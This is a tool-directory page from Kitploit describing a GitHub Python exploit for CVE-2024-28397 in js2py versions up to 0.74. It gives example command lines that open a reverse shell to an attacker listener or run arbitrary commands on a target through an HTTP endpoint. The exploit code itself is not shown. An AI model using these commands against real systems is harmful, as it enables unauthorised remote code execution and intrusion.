Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-28397-RCE — Python exploit script for CVE-2024-28397 targeting js2py <= v0.74. Supports reverse shell and custom command execution via HTTP endpoint. | Kitploit
Tools/GitHubGitHub/harutomo-jp/cve-2024-28397-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubharutomo-jp/cve-2024-28397-rce

CVE-2024-28397-RCE

Python exploit script for CVE-2024-28397 targeting js2py <= v0.74. Supports reverse shell and custom command execution via HTTP endpoint.

View Repository
121 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-28397 RCE Script

Default reverse shell payload and optional command argument allowed

exploit works for js2py <= v0.74

Requirements

  • Python 3.x
  • requests library (pip install requests)
  • Netcat listener (for reverse shell)

Example usage

Reverse shell:

root@kitploit:~
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444

Custom command:

root@kitploit:~
python exploit.py 10.129.227.108 /run_code --cmd "id"
Download Tool